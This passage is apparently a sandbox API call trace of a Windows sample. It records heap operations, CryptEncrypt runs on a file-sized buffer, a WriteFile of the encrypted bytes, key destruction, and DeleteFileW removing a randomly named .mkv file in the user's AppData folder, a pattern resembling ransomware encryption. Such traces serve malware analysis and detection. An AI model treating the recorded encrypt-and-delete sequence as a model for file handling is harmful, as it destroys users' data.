lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a755c8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.450] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x62c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x630) returned 1 [0149.450] CharLowerBuffW (in: lpsz="byte[1584]", cchLength=0xa | out: lpsz="byte[1584]") returned 0xa [0149.450] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.450] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa348, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.450] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a757e8*, pdwDataLen=0x8cef60*=0x62c, dwBufLen=0x630 | out: pbData=0x2a757e8*, pdwDataLen=0x8cef60*=0x630) returned 1 [0149.451] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.451] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.451] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.451] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.451] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.451] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.451] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a74958*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a74958*, lpNumberOfBytesWritten=0x8cf5e4*=0x630, lpOverlapped=0x0) returned 1 [0149.452] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.452] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa3a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.453] CryptDestroyKey (hKey=0x9e1d38) returned 1 [0149.453] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.453] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.453] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.454] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.467] CryptReleaseContext (hProv=0x9bf000, dwFlags=0x0) returned 1 [0149.467] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.467] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.467] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.467] CloseHandle (hObject=0x4fc) returned 1 [0149.468] CloseHandle (hObject=0x4ec) returned 1 [0149.469] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.469] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.470] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NWn0_eXN3pgA63Ym.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv", lpFilePart=0x8cedf4*="NWn0_eXN3pgA63Ym.mkv") returned 0x34 [0149.470] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nwn0_exn3pga63ym.mkv")) returned 0x20 [0149.470] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f9bdd0, ftCreationTime.dwHighDateTime=0x1d5d54e, ftLastAccessTime.dwLowDateTime=0x84f14450, ftLastAccessTime.dwHighDateTime=0x1d5cf5d, ftLastWriteTime.dwLowDateTime=0x84f14450, ftLastWriteTime.dwHighDateTime=0x1d5cf5d, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="NWn0_eXN3pgA63Ym.mkv", cAlternateFileName="NWN0_E~1.MKV")) returned 0x9e1af8 [0149.470] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nwn0_exn3pga63ym.mkv")) returned 1 [0149.475] FindNextFileW (in: hFindFile=0x9e1af8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f9bdd0, ftCreationTime.dwHighDateTime=0x1d5d54e, ftLastAccessTime.dwLowDateTime=0x84f14450, ftLastAccessTime.dwHighDateTime=0x1d5cf5d, ftLastWriteTime.dwLowDateTime=0x84f14450, ftLastWriteTime.dwHighDateTime=0x1d5cf5d, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="NWn0_eXN3pgA63Ym.mkv", cAlternateFileName="NWN0_E~1.MKV")) returned 0 [0149.475] FindClose (in: hFindFile=0x9e1af8 | out: hFindFile=0x9e1af8) returned 1 [0149.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.476] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0149.476] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.476] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6a) returned 0x29f3ee0 [0149.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NWn0_eXN3pgA63Ym.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv", lpFilePart=0x8cf650*="NWn0_eXN3pgA63Ym.mkv") returned 0x34 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0149.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NWn0_eXN3pgA63Ym.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nwn0_exn3pga63ym.mkv")) returned 0xffffffff [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.478] HeapFree (in: 